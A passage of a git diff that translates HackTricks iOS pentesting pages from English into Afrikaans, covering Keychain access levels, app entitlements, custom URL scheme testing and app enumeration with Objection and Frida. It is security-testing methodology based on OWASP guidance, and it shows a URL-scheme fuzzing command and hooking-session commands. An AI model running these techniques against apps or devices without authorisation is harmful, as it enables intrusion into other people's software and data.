Hierdie vlakke, [soos deur Apple gespesifiseer](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), bepaal wanneer en hoe Sleutelbositems toeganklik is: -Data protection levels for Keychain items are set using the `kSecAttrAccessible` attribute during item creation or update. These levels, [as specified by Apple](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), determine when and how Keychain items are accessible: +- **`kSecAttrAccessibleAlways`**: Altyd toeganklik, ongeag die toestel se sluitstatus. +- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: Altyd toeganklik, maar nie ingesluit in rugsteun nie. +- **`kSecAttrAccessibleAfterFirstUnlock`**: Toeganklik na die eerste ontgrendeling na herlaai. +- **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: Dieselfde as bogenoemde, maar nie oordraagbaar na nuwe toestelle nie. +- **`kSecAttrAccessibleWhenUnlocked`**: Slegs toeganklik wanneer die toestel ontgrendel is. +- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Toeganklik wanneer ontgrendel, nie ingesluit in rugsteun nie. +- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Vereis toestel wagwoord, nie ingesluit in rugsteun nie. -- **`kSecAttrAccessibleAlways`**: Accessible anytime, regardless of device lock status. -- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: Always accessible, but not included in backups. -- **`kSecAttrAccessibleAfterFirstUnlock`**: Accessible after the first unlock post-restart. -- **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: Same as above, but not transferable to new devices. -- **`kSecAttrAccessibleWhenUnlocked`**: Only accessible when the device is unlocked. -- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Accessible when unlocked, not included in backups. -- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Requires device passcode, not included in backups. 
+**`AccessControlFlags`** verfyn verdere toegangsmetodes, wat biometriese verifikasie of wagwoordgebruik moontlik maak. -**`AccessControlFlags`** further refine access methods, allowing for biometric authentication or passcode use. - -### **Jailbroken Devices Warning** +### **Waarskuwing vir Gehackte Toestelle** {% hint style="warning" %} -On **jailbroken devices**, the Keychain's protections are compromised, posing a significant security risk. +Op **gehackte toestelle** is die beskerming van die Sleutelbos gekompromitteer, wat 'n aansienlike veiligheidsrisiko inhou. {% endhint %} -### **Persistence of Keychain Data** - -Unlike app-specific data deleted upon app uninstallation, **Keychain data persists** on the device. This characteristic could enable new owners of a second-hand device to access the previous owner's application data simply by reinstalling apps. Developers are advised to proactively clear Keychain data upon app installation or during logout to mitigate this risk. Here's a Swift code example demonstrating how to clear Keychain data upon the first app launch: +### **Volharding van Sleutelbosdata** +In teenstelling met toepassingsspesifieke data wat uitgevee word wanneer die toepassing gedeïnstalleer word, **volhard Sleutelbosdata** op die toestel. Hierdie kenmerk kan nuwe eienaars van 'n tweedehandse toestel in staat stel om die vorige eienaar se toepassingsdata toeganklik te maak deur eenvoudigweg die toepassings te herinstalleer. Ontwikkelaars word aangeraai om proaktief Sleutelbosdata uit te wis by die installering van die toepassing of tydens afmelding om hierdie risiko te verminder. 
Hier is 'n voorbeeld van Swift-kode wat demonstreer hoe om Sleutelbosdata uit te wis by die eerste aanvang van die toepassing: ```swift let userDefaults = UserDefaults.standard if userDefaults.bool(forKey: "hasRunBefore") == false { - // Remove Keychain items here +// Remove Keychain items here - // Update the flag indicator - userDefaults.set(true, forKey: "hasRunBefore") - userDefaults.synchronize() // Forces the app to update UserDefaults +// Update the flag indicator +userDefaults.set(true, forKey: "hasRunBefore") +userDefaults.synchronize() // Forces the app to update UserDefaults } ``` +# **App-vermoëns** -# **App Capabilities** +In die wêreld van app-ontwikkeling speel **sandboxing** 'n belangrike rol in die verbetering van sekuriteit. Hierdie proses verseker dat elke app binne sy eie unieke tuisgids werk, en voorkom dus dat dit toegang tot stelsel lêers of data van ander apps verkry. Die afdwinging van hierdie beperkings word gedoen deur middel van sandbox-beleide, wat deel vorm van die **Trusted BSD (MAC) Mandatory Access Control Framework**. -In the realm of app development, **sandboxing** plays a crucial role in enhancing security. This process ensures that each app operates within its own unique home directory, thus preventing it from accessing system files or data belonging to other apps. The enforcement of these restrictions is carried out through sandbox policies, which are a part of the **Trusted BSD (MAC) Mandatory Access Control Framework**. +Ontwikkelaars het die vermoë om sekere **vermoëns of toestemmings** vir hul apps te konfigureer, soos **Data Protection** of **Keychain Sharing**. Hierdie toestemmings word onmiddellik toegepas nadat die app geïnstalleer is. Nietemin, om toegang tot sekere beskermde hulpbronne te verkry, moet die app uitdruklike toestemming van die gebruiker kry tydens die eerste poging. 
Dit word bereik deur die gebruik van _doelstrengs_ of _gebruiksbeskrywingsstrengs_, wat aan gebruikers in 'n toestemmingsversoekwaarskuwing voorgelê word. -Developers have the ability to configure certain **capabilities or permissions** for their apps, such as **Data Protection** or **Keychain Sharing**. These permissions are applied immediately after the app is installed. Nonetheless, for accessing certain protected resources, the app must obtain explicit consent from the user at the time of the first attempt. This is achieved through the use of _purpose strings_ or _usage description strings_, which are presented to users in a permission request alert. +Vir diegene wat toegang tot die bronkode het, kan verifikasie van toestemmings wat in die `Info.plist`-lêer ingesluit is, gedoen word deur: -For those with access to the source code, verification of permissions included in the `Info.plist` file can be done by: +1. Die projek in Xcode oop te maak. +2. Die `Info.plist`-lêer op te spoor en oop te maak. +3. Soek na sleutels met die voorvoegsel `"Privacy -"`, met die opsie om rou sleutels/waardes vir duidelikheid te vertoon. -1. Opening the project in Xcode. -2. Locating and opening the `Info.plist` file. -3. Searching for keys prefixed with `"Privacy -"`, with the option to view raw keys/values for clarity. +Wanneer 'n IPA-lêer hanteer word, kan die volgende stappe gevolg word: -When dealing with an IPA file, the following steps can be followed: - -1. Unzip the IPA. -2. Locate the `Info.plist` file within `Payload/.app/`. -3. Convert the file to XML format if necessary, for easier inspection. - -For example, the purpose strings in the `Info.plist` file might look like this: +1. Die IPA-lêer uitpak. +2. Die `Info.plist`-lêer binne `Payload/.app/` opspoor. +3. Die lêer na XML-formaat omskakel indien nodig, vir makliker inspeksie. 
+Byvoorbeeld, die doelstrengs in die `Info.plist`-lêer kan so lyk: ```xml - NSLocationWhenInUseUsageDescription - Your location is used to provide turn-by-turn directions to your destination. +NSLocationWhenInUseUsageDescription +Your location is used to provide turn-by-turn directions to your destination. ``` - -## Device Capabilities -The `Info.plist` file of an app specifies **device capabilities** that help the App Store filter apps for device compatibility. These are defined under the **`UIRequiredDeviceCapabilities`** key. For instance: - +## Toestelvermoëns +Die `Info.plist` lêer van 'n app spesifiseer **toestelvermoëns** wat help om die App Store te gebruik om apps te filter vir toestelverenigbaarheid. Hierdie vermoëns word gedefinieer onder die **`UIRequiredDeviceCapabilities`** sleutel. Byvoorbeeld: ```xml UIRequiredDeviceCapabilities - armv7 +armv7 ``` +Hierdie voorbeeld dui daarop dat die app versoenbaar is met die armv7 instruksiestel. Ontwikkelaars kan ook funksies soos nfc spesifiseer om te verseker dat hul app slegs beskikbaar is vir toestelle wat NFC ondersteun. -This example indicates that the app is compatible with the armv7 instruction set. Developers may also specify capabilities like nfc to ensure their app is only available to devices supporting NFC. +## Toekennings -## Entitlements - -**Entitlements** are another critical aspect of iOS app development, serving as key-value pairs that grant apps permission to perform certain operations beyond runtime checks. For example, enabling **Data Protection** in an app involves adding a specific entitlement in the Xcode project, which is then reflected in the app's entitlements file or the embedded mobile provision file for IPAs. +**Toekennings** is 'n ander kritieke aspek van iOS-app-ontwikkeling, wat dien as sleutel-waardepare wat apps toestemming gee om sekere handelinge uit te voer buite die uitvoeringstyd kontroles. 
Byvoorbeeld, om **Data Protection** in 'n app te aktiveer, moet 'n spesifieke toekenning by die Xcode-projek gevoeg word, wat dan weerspieël word in die app se toekenningslêer of die ingebedde mobiele voorsieningslêer vir IPAs. -# References +# Verwysings * [https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage](https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage) * [https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md) * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/) @@ -153,16 +143,14 @@ This example indicates that the app is compatible with the armv7 instruction set
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md b/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md index 3041d2566..577d816ef 100644 --- a/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md +++ b/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md @@ -1,79 +1,72 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-This is a sumary from the related information from [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/) +Hierdie is 'n opsomming van die verwante inligting vanaf [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/) -## Basic Information +## Basiese Inligting -Custom URL schemes enable apps to communicate using a custom protocol, as detailed in the [Apple Developer Documentation](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). These schemes must be declared by the app, which then handles incoming URLs following those schemes. It's crucial to **validate all URL parameters** and **discard any malformed URLs** to prevent attacks through this vector. +Aangepaste URL-skemas stel programme in staat om te kommunikeer deur middel van 'n aangepaste protokol, soos beskryf in die [Apple Developer Documentation](https://developer.apple.com/library/content/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW1). Hierdie skemas moet deur die toepassing verklaar word, wat dan inkomende URL's volgens daardie skemas hanteer. Dit is noodsaaklik om **alle URL-parameters te valideer** en **enige verkeerd geformuleerde URL's te verwerp** om aanvalle deur hierdie vektor te voorkom. -An example is given where the URI `myapp://hostname?data=123876123` invokes a specific application action. A noted vulnerability was in the Skype Mobile app, which allowed unpermitted call actions via the `skype://` protocol. The registered schemes can be found in the app's `Info.plist` under `CFBundleURLTypes`. 
Malicious applications can exploit this by re-registering URIs to intercept sensitive information. +'n Voorbeeld word gegee waar die URI `myapp://hostname?data=123876123` 'n spesifieke toepassingsaksie aanroep. 'n Opmerklike kwesbaarheid was in die Skype Mobile-toep, wat ongemagtigde oproepaksies via die `skype://`-protokol toegelaat het. Die geregistreerde skemas kan gevind word in die toep se `Info.plist` onder `CFBundleURLTypes`. Kwaadwillige toepassings kan hiervan misbruik maak deur URI's te herregistreer om sensitiewe inligting te onderskep. -### Application Query Schemes Registration - -From iOS 9.0, to check if an app is available, `canOpenURL:` requires declaring URL schemes in the `Info.plist` under `LSApplicationQueriesSchemes`. This limits the schemes an app can query to 50, enhancing privacy by preventing app enumeration. +### Registrasie van Toepassingsnavraagskemas +Vanaf iOS 9.0, om te kontroleer of 'n toepassing beskikbaar is, vereis `canOpenURL:` dat URL-skemas verklaar word in die `Info.plist` onder `LSApplicationQueriesSchemes`. Dit beperk die skemas wat 'n toepassing kan ondersoek tot 50, wat privaatheid verbeter deur toepassingsopnoeming te voorkom. ```xml LSApplicationQueriesSchemes - url_scheme1 - url_scheme2 +url_scheme1 +url_scheme2 ``` +### Toetsing van URL-hantering en validering -### Testing URL Handling and Validation - -Developers should inspect specific methods in the source code to understand URL path construction and validation, such as `application:didFinishLaunchingWithOptions:` and `application:openURL:options:`. For instance, Telegram employs various methods for opening URLs: - +Ontwikkelaars moet spesifieke metodes in die bronkode ondersoek om URL-padkonstruksie en validering te verstaan, soos `application:didFinishLaunchingWithOptions:` en `application:openURL:options:`. 
Byvoorbeeld, Telegram maak gebruik van verskeie metodes om URL's te open: ```swift func application(_ application: UIApplication, open url: URL, sourceApplication: String?) -> Bool { - self.openUrl(url: url) - return true +self.openUrl(url: url) +return true } func application(_ application: UIApplication, open url: URL, sourceApplication: String?, annotation: Any) -> Bool { - self.openUrl(url: url) - return true +self.openUrl(url: url) +return true } func application(_ app: UIApplication, open url: URL, options: [UIApplicationOpenURLOptionsKey : Any] = [:]) -> Bool { - self.openUrl(url: url) - return true +self.openUrl(url: url) +return true } func application(_ application: UIApplication, handleOpen url: URL) -> Bool { - self.openUrl(url: url) - return true +self.openUrl(url: url) +return true } ``` +### Toetsing van URL-aanvragen aan andere apps -### Testing URL Requests to Other Apps +Metodes soos `openURL:options:completionHandler:` is noodsaaklik vir die oopmaak van URL's om met ander apps te kommunikeer. Die identifisering van die gebruik van sulke metodes in die bronkode van die app is sleutel tot die verstaan van eksterne kommunikasie. -Methods like `openURL:options:completionHandler:` are crucial for opening URLs to interact with other apps. Identifying usage of such methods in the app's source code is key for understanding external communications. +### Toetsing vir verouderde metodes -### Testing for Deprecated Methods +Verouderde metodes wat URL-oopmakings hanteer, soos `application:handleOpenURL:` en `openURL:`, moet geïdentifiseer en nagegaan word vir sekuriteitsimplikasies. -Deprecated methods handling URL openings, such as `application:handleOpenURL:` and `openURL:`, should be identified and reviewed for security implications. - -### Fuzzing URL Schemes - -Fuzzing URL schemes can identify memory corruption bugs. 
Tools like [Frida](https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/) can automate this process by opening URLs with varying payloads to monitor for crashes, exemplified by the manipulation of URLs in the iGoat-Swift app: +### Fuzzing van URL-skemas +Fuzzing van URL-skemas kan geheueversteuringsfoute identifiseer. Hulpmiddels soos [Frida](https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/) kan hierdie proses outomatiseer deur URL's met verskillende ladinge oop te maak om te monitor vir ongelukke, soos geïllustreer deur die manipulasie van URL's in die iGoat-Swift-app: ```bash $ frida -U SpringBoard -l ios-url-scheme-fuzzing.js [iPhone::SpringBoard]-> fuzz("iGoat", "iGoat://?contactNumber={0}&message={0}") @@ -81,23 +74,19 @@ Watching for crashes from iGoat... No logs were moved. Opened URL: iGoat://?contactNumber=0&message=0 ``` - - -## References +## Verwysings * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md b/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md index 9ee65197f..8352e5497 100644 --- a/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md +++ b/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md @@ -1,286 +1,279 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-For this section the tool [**Objection**](https://github.com/sensepost/objection) is going to be used.\ -Start by getting an objection's session executing something like: - +Vir hierdie gedeelte gaan die instrument [**Objection**](https://github.com/sensepost/objection) gebruik word.\ +Begin deur 'n Objection-sessie te kry deur iets soos die volgende uit te voer: ```bash objection -d --gadget "iGoat-Swift" explore objection -d --gadget "OWASP.iGoat-Swift" explore ``` +Jy kan ook `frida-ps -Uia` uitvoer om die lopende prosesse van die foon te kontroleer. -You can execute also `frida-ps -Uia` to check the running processes of the phone. +# Basiese Opname van die app -# Basic Enumeration of the app +## Plaaslike App Paaie -## Local App Paths +* `env`: Vind die paaie waar die toepassing binne die toestel gestoor word -* `env`: Find the paths where the application is stored inside the device +```bash +env - ```bash - env +Name Path +----------------- ----------------------------------------------------------------------------------------------- +BundlePath /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F546068/iGoat-Swift.app +CachesDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library/Caches +DocumentDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Documents +LibraryDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library +``` - Name Path - ----------------- ----------------------------------------------------------------------------------------------- - BundlePath /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F546068/iGoat-Swift.app - CachesDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library/Caches - DocumentDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Documents - LibraryDirectory 
/var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library - ``` +## Lys Bundels, raamwerke en biblioteke -## List Bundles, frameworks and libraries +* `ios bundles list_bundles`: Lys bundels van die toepassing -* `ios bundles list_bundles`: List bundles of the application +```bash +ios bundles list_bundles +Executable Bundle Version Path +------------ -------------------- --------- ------------------------------------------- +iGoat-Swift OWASP.iGoat-Swift 1.0 ...8-476E-BBE3-B9300F546068/iGoat-Swift.app +AGXMetalA9 com.apple.AGXMetalA9 172.18.4 ...tem/Library/Extensions/AGXMetalA9.bundle +``` +* `ios bundles list_frameworks`: Lys eksterne raamwerke wat deur die toepassing gebruik word - ```bash - ios bundles list_bundles - Executable Bundle Version Path - ------------ -------------------- --------- ------------------------------------------- - iGoat-Swift OWASP.iGoat-Swift 1.0 ...8-476E-BBE3-B9300F546068/iGoat-Swift.app - AGXMetalA9 com.apple.AGXMetalA9 172.18.4 ...tem/Library/Extensions/AGXMetalA9.bundle - ``` -* `ios bundles list_frameworks`: List external frameworks used by the application +```bash +ios bundles list_frameworks +Executable Bundle Version Path +------------------------------ -------------------------------------------- ---------- ------------------------------------------- +ReactCommon org.cocoapods.ReactCommon 0.61.5 ...tle.app/Frameworks/ReactCommon.framework +...vateFrameworks/CoreDuetContext.framework +FBReactNativeSpec org.cocoapods.FBReactNativeSpec 0.61.5 ...p/Frameworks/FBReactNativeSpec.framework +...ystem/Library/Frameworks/IOKit.framework +RCTAnimation org.cocoapods.RCTAnimation 0.61.5 ...le.app/Frameworks/RCTAnimation.framework +jsinspector org.cocoapods.jsinspector 0.61.5 ...tle.app/Frameworks/jsinspector.framework +DoubleConversion org.cocoapods.DoubleConversion 1.1.6 ...pp/Frameworks/DoubleConversion.framework +react_native_config org.cocoapods.react-native-config 0.12.0 
...Frameworks/react_native_config.framework +react_native_netinfo org.cocoapods.react-native-netinfo 4.4.0 ...rameworks/react_native_netinfo.framework +PureLayout org.cocoapods.PureLayout 3.1.5 ...ttle.app/Frameworks/PureLayout.framework +GoogleUtilities org.cocoapods.GoogleUtilities 6.6.0 ...app/Frameworks/GoogleUtilities.framework +RCTNetwork org.cocoapods.RCTNetwork 0.61.5 ...ttle.app/Frameworks/RCTNetwork.framework +RCTActionSheet org.cocoapods.RCTActionSheet 0.61.5 ....app/Frameworks/RCTActionSheet.framework +react_native_image_editor org.cocoapods.react-native-image-editor 2.1.0 ...orks/react_native_image_editor.framework +CoreModules org.cocoapods.CoreModules 0.61.5 ...tle.app/Frameworks/CoreModules.framework +RCTVibration org.cocoapods.RCTVibration 0.61.5 ...le.app/Frameworks/RCTVibration.framework +RNGestureHandler org.cocoapods.RNGestureHandler 1.6.1 ...pp/Frameworks/RNGestureHandler.framework +RNCClipboard org.cocoapods.RNCClipboard 1.5.1 ...le.app/Frameworks/RNCClipboard.framework +react_native_image_picker org.cocoapods.react-native-image-picker 2.3.4 ...orks/react_native_image_picker.framework +[..] 
+``` +* `memory list modules`: Lys gelaai modules in die geheue - ```bash - ios bundles list_frameworks - Executable Bundle Version Path - ------------------------------ -------------------------------------------- ---------- ------------------------------------------- - ReactCommon org.cocoapods.ReactCommon 0.61.5 ...tle.app/Frameworks/ReactCommon.framework - ...vateFrameworks/CoreDuetContext.framework - FBReactNativeSpec org.cocoapods.FBReactNativeSpec 0.61.5 ...p/Frameworks/FBReactNativeSpec.framework - ...ystem/Library/Frameworks/IOKit.framework - RCTAnimation org.cocoapods.RCTAnimation 0.61.5 ...le.app/Frameworks/RCTAnimation.framework - jsinspector org.cocoapods.jsinspector 0.61.5 ...tle.app/Frameworks/jsinspector.framework - DoubleConversion org.cocoapods.DoubleConversion 1.1.6 ...pp/Frameworks/DoubleConversion.framework - react_native_config org.cocoapods.react-native-config 0.12.0 ...Frameworks/react_native_config.framework - react_native_netinfo org.cocoapods.react-native-netinfo 4.4.0 ...rameworks/react_native_netinfo.framework - PureLayout org.cocoapods.PureLayout 3.1.5 ...ttle.app/Frameworks/PureLayout.framework - GoogleUtilities org.cocoapods.GoogleUtilities 6.6.0 ...app/Frameworks/GoogleUtilities.framework - RCTNetwork org.cocoapods.RCTNetwork 0.61.5 ...ttle.app/Frameworks/RCTNetwork.framework - RCTActionSheet org.cocoapods.RCTActionSheet 0.61.5 ....app/Frameworks/RCTActionSheet.framework - react_native_image_editor org.cocoapods.react-native-image-editor 2.1.0 ...orks/react_native_image_editor.framework - CoreModules org.cocoapods.CoreModules 0.61.5 ...tle.app/Frameworks/CoreModules.framework - RCTVibration org.cocoapods.RCTVibration 0.61.5 ...le.app/Frameworks/RCTVibration.framework - RNGestureHandler org.cocoapods.RNGestureHandler 1.6.1 ...pp/Frameworks/RNGestureHandler.framework - RNCClipboard org.cocoapods.RNCClipboard 1.5.1 ...le.app/Frameworks/RNCClipboard.framework - react_native_image_picker org.cocoapods.react-native-image-picker 2.3.4 
...orks/react_native_image_picker.framework - [..] - ``` -* `memory list modules`: List loaded modules in memory +```bash +memory list modules +Name Base Size Path +----------------------------------- ----------- ------------------- ------------------------------------------------------------------------------ +iGoat-Swift 0x104ffc000 2326528 (2.2 MiB) /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F54... +SubstrateBootstrap.dylib 0x105354000 16384 (16.0 KiB) /usr/lib/substrate/SubstrateBootstrap.dylib +SystemConfiguration 0x1aa842000 495616 (484.0 KiB) /System/Library/Frameworks/SystemConfiguration.framework/SystemConfiguratio... +libc++.1.dylib 0x1bdcfd000 368640 (360.0 KiB) /usr/lib/libc++.1.dylib +libz.1.dylib 0x1efd3c000 73728 (72.0 KiB) /usr/lib/libz.1.dylib +libsqlite3.dylib 0x1c267f000 1585152 (1.5 MiB) /usr/lib/libsqlite3.dylib +Foundation 0x1ab550000 2732032 (2.6 MiB) /System/Library/Frameworks/Foundation.framework/Foundation +libobjc.A.dylib 0x1bdc64000 233472 (228.0 KiB) /usr/lib/libobjc.A.dylib +[...] +``` +* `memory list exports `: Uitvoere van 